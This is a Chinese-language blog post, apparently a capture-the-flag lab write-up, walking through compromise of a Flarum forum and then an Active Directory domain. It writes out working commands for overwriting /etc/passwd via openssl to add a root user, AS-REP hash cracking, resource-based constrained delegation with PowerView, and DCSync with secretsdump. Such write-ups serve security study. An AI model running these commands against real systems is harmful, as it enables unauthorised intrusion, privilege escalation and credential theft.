<!DOCTYPE html>
<html lang="zh">
  <head prefix="og: https://ogp.me/ns#">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="color-scheme" content="light dark">
  
  <title>Flarum - DashingBug</title>
  
    <link rel="shortcut icon" href="/./bug.png">
  
  
  <link rel='manifest' href='/manifest.json'>
  

  
  
  
  <meta property="og:title" content="Flarum - DashingBug" />
  
  <meta property="og:type" content="article" />
  
  <meta property="og:url" content="http://dashingbug.xin/2026/03/07/Flarum/index.html" />
  
  <meta property="og:image" content="/favicon.png" />
  
  <meta property="og:article:published_time" content="2026-03-06T16:00:00.000Z" />
  
  <meta property="og:article:author" content="DashingBug" />
  
  

  
  
<link rel="stylesheet" href="https://unpkg.com/simple-icons-font@v13/font/simple-icons.min.css">

  
  
  
<link rel="stylesheet" href="https://unpkg.com/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">

  

  
<link rel="stylesheet" href="/css/var.css">

  
<link rel="stylesheet" href="/css/main.css">

  
<link rel="stylesheet" href="/css/typography.css">

  
<link rel="stylesheet" href="/css/code-highlighting.css">

  
  
  
<link rel="stylesheet" href="/css/components/card.css">

  
  
  
  
<link rel="stylesheet" href="/css/components/button.css">

  
  
  
  
<link rel="stylesheet" href="/css/components/badge.css">

  
  
  
  
<link rel="stylesheet" href="/css/components/utilities.css">

  
  
  
<link rel="stylesheet" href="/css/nav.css">

  
<link rel="stylesheet" href="/css/paginator.css">

  
<link rel="stylesheet" href="/css/footer.css">

  
<link rel="stylesheet" href="/css/post-list.css">

  
  
<link rel="stylesheet" href="/css/rainbow-banner.css">

  
  
  
<link rel="stylesheet" href="/css/toc.css">

  
  
  
  
  
<link rel="stylesheet" href="/css/post.css">

  
  
  
  
  
  
  
<link rel="stylesheet" href="/css/scroll-reveal.css">

  
  
  
<link rel="stylesheet" href="/css/view-transition.css">

  
  
  <script src="https://unpkg.com/lenis@1.1.9/dist/lenis.min.js"></script>
  
<link rel="stylesheet" href="https://unpkg.com/lenis@1.1.9/dist/lenis.css">

  
<script src="/js/smooth-scroll.js"></script>

  

  

  <script>var ThemeCupertino = {}</script>
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body
    data-color-scheme="auto"
    data-uppercase-categories="true"
    
    data-rainbow-banner="true"
    data-rainbow-banner-shown="always"
    data-rainbow-banner-month="6"
    data-rainbow-banner-colors="#e50000,#ff8d00,#ffee00,#008121,#004cff,#760188"
    
    data-config-root="/"
    
    data-toc="true"
    data-toc-max-depth="2"
    
    
    
    data-scroll-reveal-disappear="false"
    data-scroll-reveal-query=".scroll-reveal, .post-list-item, .card, .content p img, .content .block-large img"
    
  >
    <a href="#main-content" id="skip-to-content">Skip to content</a>
    <nav id="theme-nav">
  <div class="inner">
    <a class="title" href="/">Space</a>
    <div class="nav-arrow"></div>
    <div class="nav-items">
      <a class="nav-item nav-item-home" href="/" style="--index: 0">Home</a>

      
      <a class="nav-item" href="/archives" style="--index: 1">Archives</a>
      
      <a class="nav-item" href="http://dashingbug.xin/link/link.html" style="--index: 2">link</a>
      
      <a class="nav-item" href="/projects" style="--index: 3">Projects</a>
      
      <a class="nav-item" href="/about" style="--index: 4">About</a>
      
      <a class="nav-item is-icon" target="_blank" rel="noopener" href="https://github.com/MrWillCom" style="--index: 5"><i class="si si-github"></i></a>
      
      <a class="nav-item is-icon" target="_blank" rel="noopener" href="https://codepen.io/mrwillcom" style="--index: 6"><i class="si si-codepen"></i></a>
      
      <a class="nav-item is-icon" target="_blank" rel="noopener" href="https://www.patreon.com/MrWillCom" style="--index: 7"><i class="si si-patreon"></i></a>
      
      <a class="nav-item is-icon" target="_blank" rel="noopener" href="https://noc.social/@MrWillCom" style="--index: 8"><i class="si si-mastodon"></i></a>
      
      <a class="nav-item is-icon" href="/search" style="--index: 9"><i class="bi bi-search"></i></a>
      
    </div>
  </div>
</nav>

    <main id="main-content">
      
<article class="post">
  <div class="meta">
    

    
    <time class="date" datetime="2026-03-07T00:00:00+08:00">
      March 7, 2026
    </time>
    

    <h1 class="title">Flarum</h1>
  </div>

  <div class="content">
    <p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260307145659657.png" alt="image-20260307145652571"></p>
<p>fscan扫出来80端口存活，给了个邮箱，疑似用户名，测试一下</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260307145806734.png" alt="image-20260307145806706"></p>
<p>尝试爆破</p>
<p>遇见了一个问题，对面发包给的flarum_session和X-CSRF隔一段时间就会失效，而这个密码又不好爆破，需要很大的字典，所以后面就会失效，目前不知道咋解决，感觉得用Python脚本，yakit没这功能。（yakit其实有这功能</p>
<p><a target="_blank" rel="noopener" href="https://wiki.bafangwy.com/doc/851/%E6%96%87%E7%AB%A0%E4%B8%AD%E7%94%A8%E7%9A%84Xpath%E6%8F%90%E5%8F%96%E6%95%B0%E6%8D%AE%EF%BC%8C%E6%88%91%E4%BB%AC%E5%9B%A0%E4%B8%BA%E6%98%AF%E8%A6%81%E6%8F%90%E5%8F%96%E8%AF%B7%E6%B1%82%E5%A4%B4%E4%B8%AD%E7%9A%84%EF%BC%8C%E6%89%80%E4%BB%A5%E5%B0%86Xpath%E6%8D%A2%E6%88%90%E9%94%AE%E5%80%BC%E5%AF%B9%EF%BC%8C%E6%8F%90%E5%8F%96%E4%BD%8D%E7%BD%AE%E5%B0%86raw%E6%8D%A2%E6%88%90%E8%AF%B7%E6%B1%82%E5%A4%B4%E5%8D%B3%E5%8F%AF%EF%BC%89">https://wiki.bafangwy.com/doc/851/文章中用的Xpath提取数据，我们因为是要提取请求头中的，所以将Xpath换成键值对，提取位置将raw换成请求头即可）</a></p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260307154325506.png" alt="image-20260307154325465"></p>
<p>暂时不管咋爆破，先进下一步，根据wp可知密码爆破出来是1chris</p>
<p>其实没进来前就可以发现对面是flarum框架，搜一下已存在的漏洞发现</p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/flarum-rce-tour.html">从偶遇Flarum开始的RCE之旅 | 离别歌</a></p>
<p>阅读一下可知利用这个漏洞必须要有管理员权限，刚好已经获得了，其实这也可以是引导爆破密码的思路</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260307155053553.png" alt="image-20260307155053486"></p>
<p>在后台找到这个功能，下面这个不行不知道为啥</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260307155453327.png" alt="image-20260307155453287"></p>
<p>这个可以</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260307162517939.png" alt="image-20260307162517913"></p>
<p>跟着文章复现一下，但是跟文章有点不一样，@import (inline)后面要用单引号包裹，并且在最后加上一个;不然会有语法错误，在写了第一个css文件后要等一会，感觉可能是写文件要一点时间，最好在成功访问&#x2F;assets&#x2F;forum.css后再写第二个css文件</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260307162435151.png" alt="image-20260307162435114"></p>
<p>成功反弹</p>
<p>是web用户，权限很低，接下来进行提权</p>
<p>suid试了一下发现不行，晚点研究研究suid的原理</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/f-carey/p/16026088.html">Linux提权之：利用capabilities提权 - f_carey - 博客园</a></p>
<p>用文章中的方法</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260307170635662.png" alt="image-20260307170635633"></p>
<p>发现openssl可以利用</p>
<p>利用高权限覆盖&#x2F;etc&#x2F;passwd从而创建具有root权限的新用户</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> /tmp;<span class="built_in">cd</span> /tmp</span><br><span class="line"><span class="built_in">touch</span> 1.txt</span><br><span class="line"><span class="built_in">cat</span> /etc/passwd &gt; 1.txt</span><br><span class="line">perl -e <span class="string">&#x27;print crypt(&quot;123456&quot;, &quot;ad&quot;), &quot;\n&quot;&#x27;</span>（输出adrla7IBSfTZQ，这就是123456哈希之后的值）</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;test2:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash&quot;</span> &gt;&gt; 1.txt</span><br><span class="line"><span class="built_in">cat</span> 1.txt | openssl enc -out <span class="string">&quot;/etc/passwd&quot;</span></span><br></pre></td></tr></table></figure>

<p>之后用su test2 就能成功切换成test2了</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260308160923986.png" alt="image-20260308160916914"></p>
<p>当然如果说知道文件位置就不用添加新用户了</p>
<p>openssl enc -in “文件path”就能直接读</p>
<p>下次如果反弹shell了立马写马或者ssh，太难用了，这次写马半天连不上发现是校园网的问题，下次干这种就用热点吧</p>
<p>之后在内网用fscan扫，发现另外三台存活主机</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260308174733660.png" alt="image-20260308174733610"></p>
<p>发现域控开了一个88端口，搜了一下88端口是用kerberos协议的。该协议用于网络身份验证和单点登录服务</p>
<p>在web服务目录下找到了config.php。里面有数据库账号和密码</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260308190220125.png" alt="image-20260308190220082"></p>
<p>但是登陆的时候在蚁剑上老是有问题，反弹的终端又难用，不知道咋才能在终端上登mysql</p>
<p>shell连不上就换本地的navicat</p>
<p><img src="C:\Users\DashingBug\AppData\Roaming\Typora\typora-user-images\image-20260309153632675.png" alt="image-20260309153632675"></p>
<p><img src="C:\Users\DashingBug\AppData\Roaming\Typora\typora-user-images\image-20260309153549354.png" alt="image-20260309153549354"></p>
<p>注意因为要连Localhost，所以proxifier代理要把第一个规则给关了，给自定义的添上localhost</p>
<p><img src="C:\Users\DashingBug\AppData\Roaming\Typora\typora-user-images\image-20260309153952240.png" alt="image-20260309153952240"></p>
<p>但是我发现localhost就能连上，但是内网ip就不行</p>
<p>ai说是localhost走的是 FRP 的本地回环转发（或者 MySQL 的 Unix Socket），而 <code>172.22.60.52</code> 触发了 MySQL 的权限拒绝或绑定限制</p>
<p>将user表里面的用户名提取到user.txt中，用Impact的GetNpUsers爆破一下开启了 <code>UF_DONT_REQUIRE_PREAUTH</code> 属性的用户，这样就能绕过Kerbros身份验证</p>
<p><img src="C:\Users\DashingBug\AppData\Roaming\Typora\typora-user-images\image-20260309163214133.png" alt="image-20260309163214133"></p>
<p>找到两个不用kerberos验证的,wangyun和zhangxin</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">D:\Intranet\hashcat-7.1.2&gt;hashcat -m 18200 D:\hash.txt D:\Intranet\hashcat-7.1.2\rockyou\1.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260309164346501.png" alt="image-20260309164346412"></p>
<p>成功爆破出来了wangyu的密码</p>
<p>蚁剑有时候curl下载工具下不好，反弹shell或者ssh登录后再下</p>
<p>用bloodhound跑一下</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260310144037193.png" alt="image-20260310144030111"></p>
<p> 我的bloodhound好像比别人的垃圾一点</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260310153017387.png" alt="image-20260310153017325"></p>
<p>它只找得到到FILESERVER的路径，找不到FILESERVER到XIAORANG.LAB的路径，也就是说wp里面的Dcsync漏洞它找不到</p>
<p>这里可以看到zhangxin属于ACCOUNT OPERATORS组，ACCOUNT OPERATORS组拥有对除域控外的计算机对象的GenericAll权限，而且正常情况下bloodhound应该扫得出来Fileserver拥有Dcsync，与题目描述中所说黑客留下的域控制器后门相符。所以思路就是利用zhangxin给Fileserver配置RBDC，最后用Dscync拿下域控</p>
<p>扫一下之前发现的PC1</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260310155508128.png" alt="image-20260310155508100"></p>
<p>有个3389，rdp登录</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260310155939581.png" alt="image-20260310155939426"></p>
<p>有个xshell，但是我tm打不开啊，怎么处处跟wp说的不一样啊，网上搜的解决方法结果wangyun的权限不够，我看看能不能直接用wp的方法在不打开xshell的情况下弄出来</p>
<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260310162530616.png" alt="image-20260310162530574"></p>
<p>可以可以，这工具牛逼，</p>
<p>成功拿到zhangxin密码</p>
<p>后面的全部都跟着wp无脑过了一遍了，接下来学习一下为什么要这么做</p>
<p>接下来打RBCD(Resource Based Constrained Delegation, 基于资源的约束委派)</p>
<p>参考这篇文章</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/11001#toc-18">域渗透之委派攻击全集-先知社区</a></p>
<p>什么是委派？即允许A将自己的权限赐给服务B，然后服务B用A的权限去访问服务C</p>
<h4 id="RBCD与其他委派有什么区别？"><a href="#RBCD与其他委派有什么区别？" class="headerlink" title="RBCD与其他委派有什么区别？"></a>RBCD与其他委派有什么区别？</h4><p>在设置人上：其他委派需要域管理员去设置委派相关属性，但是RBCD只需要资源的管理员自己设置就行，谁是资源的管理员？即机器自身和将此机器加入域的域用户</p>
<p>在设置的地方上：其他的委派是在委派人上，即修改服务A的属性msDS-AlowedToDelegateTo为BDefinite的SPN,A就可以模仿任意用户像域控申请访问服务B的ST服务票据。RBCD则是相反的，是修改B的属性AllowedToActOnBehalfOfotherldentity为A的SID,从而A可以模仿任意用户访问B</p>
<p>msDS-AllowedToActOnBehalfOfOtherIdentity属性指向委派账户（也就是我们创建的机器账户或已知机器账户）</p>
<p>条件：</p>
<p>1.具有修改B属性的权限（如已经控制了主机WEB,则可以修改WEB的属性的权限账户）</p>
<p>2.可以创建机器账户的域用户（或已知机器账户）</p>
<h4 id="票据是什么"><a href="#票据是什么" class="headerlink" title="票据是什么"></a>票据是什么</h4><p>RBCD就是允许一个主体（如test1$）代表一个用户（如administrator）向目标资源（如WEB计算机）请求服务</p>
<p>给 <code>WEB</code> 计算机设置 <code>msds-allowedtoactonbehalfofotheridentity</code>，相当于告诉域控制器（DC）：“允许 <code>test1$</code> 代表其他用户访问我（WEB）”</p>
<p>基于这个权限，让 <code>test1$</code> 向 DC 申请一张 “冒充 <code>administrator</code> 访问 <code>WEB</code> 的 <code>cifs</code> 服务” 的票据（ST），拿着这张票据就能直接访问 <code>WEB</code> 的文件共享（CIFS）等资源。</p>
<h4 id="什么用户能修改机器账户上的属性："><a href="#什么用户能修改机器账户上的属性：" class="headerlink" title="什么用户能修改机器账户上的属性："></a>什么用户能修改机器账户上的属性：</h4><p>1.将主机加入域的账户(账户中有一个<code>mSDS-CreatorSID</code>属性，用于标记加入域时使用的用户的SID值，反查就可以知道是谁把机器加入域的了）</p>
<p>2.Account Operator组成员</p>
<p>3.该主机的机器账户</p>
<h4 id="利用方式1：基于资源的约束委派攻击本地提权（有将目标主机加入域的域用户权限）"><a href="#利用方式1：基于资源的约束委派攻击本地提权（有将目标主机加入域的域用户权限）" class="headerlink" title="利用方式1：基于资源的约束委派攻击本地提权（有将目标主机加入域的域用户权限）"></a>利用方式1：基于资源的约束委派攻击本地提权（有将目标主机加入域的域用户权限）</h4><p>如果获取到了many权限，则可以对是被many加入域的主机（假如名为WEB）进行RBCD攻击</p>
<p>1.利用many创建一个机器账户（每个域用户可以默认创建10个）</p>
<p>2.修改WEB的msDS-AllowedToActOnBehalfOfOtherIdentity为新创建机器账户的SID</p>
<p>3.利用机器账户申请票据进行提权</p>
<h5 id="创建机器账户"><a href="#创建机器账户" class="headerlink" title="创建机器账户"></a>创建机器账户</h5><p>利用Powermad.ps1</p>
<p>创建机器账户test1 密码123456</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">powershell</span><br><span class="line">Set-ExecutionPolicy Bypass -Scope Process</span><br><span class="line">import-module .\Powermad.ps1</span><br><span class="line">New-MachineAccount -MachineAccount test1 -Password $(ConvertTo-SecureString &quot;123456&quot; -AsPlainText -Force)</span><br></pre></td></tr></table></figure>

<p>利用powerView查询机器账户的sid(也可手动)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Get-NetComputer test1 -Properties objectsid</span><br></pre></td></tr></table></figure>

<p>test1 sid：S-1-5-21-1400638014-602433399-2258725660-1148</p>
<p>设置委派，修改WEB的msds-allowedtoactonbehalfofotheridentity的值</p>
<p>利用PowerView.ps1</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">powershell</span><br><span class="line">Set-ExecutionPolicy Bypass -Scope Process</span><br><span class="line">import-module .\powerview.ps1</span><br><span class="line">$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList &quot;O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1400638014-602433399-2258725660-1148)&quot;</span><br><span class="line">$SDBytes = New-Object byte[] ($SD.BinaryLength)</span><br><span class="line">$SD.GetBinaryForm($SDBytes, 0)</span><br><span class="line">Get-DomainComputer WEB| Set-DomainObject -Set @&#123;&#x27;msds-allowedtoactonbehalfofotheridentity&#x27;=$SDBytes&#125; -Verbose</span><br></pre></td></tr></table></figure>

<p>然后生成票据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 getST.py -dc-ip 10.150.127.166 haishi.com/test1\$:123456 -spn cifs/WEB.haishi.com -impersonate administrator</span><br></pre></td></tr></table></figure>

<p>导入票据（生成票据后会默认保存为administrator.ccache ）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 导入票据到环境变量</span><br><span class="line">export KRB5CCNAME=administrator.ccache   </span><br><span class="line">#用票据访问WEB的cifs服务</span><br><span class="line">python3 wmiexec.py WEB.haishi.com -no-pass -k -dc-ip 10.150.127.166</span><br></pre></td></tr></table></figure>

<h4 id="利用方式2：Account-Operator组用户"><a href="#利用方式2：Account-Operator组用户" class="headerlink" title="利用方式2：Account Operator组用户"></a>利用方式2：Account Operator组用户</h4><p>如果获得Acount Operators组用户就可以获得域内除了域控的所有主机权限</p>
<p>Acount Operators组成员可以修改域内除了域控其他所有主机的<code>msDS-AllowedToActOnBehalfOfOtherIdentity</code>属性</p>
<p>步骤和利用方式1相同</p>
<p>还有方式3和4，具体就去看上面那篇域渗透之委派攻击全集</p>
<p>委派暂时告一段落，接下来继续分析题目</p>
<p>申请票据完了后就获取了FILESERVER的SYSTEM权限</p>
<p>直接获取flag就行</p>
<p>接下来打Dcsync</p>
<p>获取FILESERVER机器账户的哈希</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains python3 secretsdump.py -k -no-pass Fileserver.xiaorang.lab -dc-ip 172.22.60.8</span><br></pre></td></tr></table></figure>

<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260311130017451.png" alt="image-20260311130010315"></p>
<p>写下来用机器账户进行Dcsync</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains secretsdump.py xiaorang.lab/&#x27;Fileserver$&#x27;:@172.22.60.8 -hashes &#x27;:951d8a9265dfb652f42e5c8c497d70dc&#x27; -just-dc-user Administrator</span><br></pre></td></tr></table></figure>

<p><img src="https://dashingbug.oss-cn-beijing.aliyuncs.com/blog/20260311130613992.png" alt="image-20260311130613859"></p>
<p>获得域控哈希之后就可以PTH登录所有主机了</p>

  </div>

  
  <div class="about">
    <h1>About this Post</h1>
    <div class="details">
      <p>This post is written by DashingBug, licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc/4.0">CC BY-NC 4.0</a>.</p>
    </div>
    
  </div>
  

  <div class="container post-prev-next">
    
    <a href="/2026/03/11/Brute4Road/" class="next">
      <div class="text">
        <p class="label">Next</p>
        <h3 class="title">Brute4Road</h3>
      </div>
    </a>
    
    
    <a href="/2026/03/06/ThermalPower/" class="prev">
      <div class="text">
        <p class="label">Previous</p>
        <h3 class="title">ThermalPower</h3>
      </div>
    </a>
    
  </div>

  
    
    
  
</article>


    </main>
    <footer>
  <div class="inner">
    <div class="links">
      
      <div class="group">
        <h2 class="title">Blog</h2>
        
        <a href="/" class="item">Home</a>
        
        <a href="/archives" class="item">Archives</a>
        
        <a href="/tags" class="item">Tags</a>
        
        <a href="/categories" class="item">Categories</a>
        
        <a href="/search" class="item">Search</a>
        
        <a href="/links" class="item">link</a>
        
        <a href="/projects" class="item">Projects</a>
        
        <a href="/resume" class="item">Resume</a>
        
        <a href="/about" class="item">About</a>
        
        <a href="/atom.xml" class="item">RSS</a>
        
      </div>
      
      <div class="group">
        <h2 class="title">Projects</h2>
        
        <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/hexo-theme-cupertino" class="item">Hexo Theme Cupertino</a>
        
        <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/next-mastodon-gallery" class="item">Next Mastodon Gallery</a>
        
      </div>
      
      <div class="group">
        <h2 class="title">Me</h2>
        
        <a target="_blank" rel="noopener" href="https://github.com/MrWillCom" class="item">GitHub</a>
        
        <a target="_blank" rel="noopener" href="https://codepen.io/mrwillcom" class="item">CodePen</a>
        
        <a target="_blank" rel="noopener" href="https://www.patreon.com/MrWillCom" class="item">Patreon</a>
        
        <a target="_blank" rel="noopener" href="https://noc.social/@MrWillCom" class="item">Mastodon</a>
        
        <a href="mailto:mr.will.com@outlook.com" class="item">Email</a>
        
      </div>
      
    </div>
    <span>&copy; 2026 DashingBug<br>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></span>
    
    
      <br>
      <div class="color-scheme-toggle" role="radiogroup" id="theme-color-scheme-toggle">
        <label>
          <input type="radio" value="light">
          <span>Light</span>
        </label>
        <label>
          <input type="radio" value="dark">
          <span>Dark</span>
        </label>
        <label>
          <input type="radio" value="auto">
          <span>Auto</span>
        </label>
      </div>
    
  </div>
</footer>


    
<script src="/js/main.js"></script>


    

    
    
<script src="/js/scroll-reveal.js"></script>

    

    

    

    
  </body>
</html>
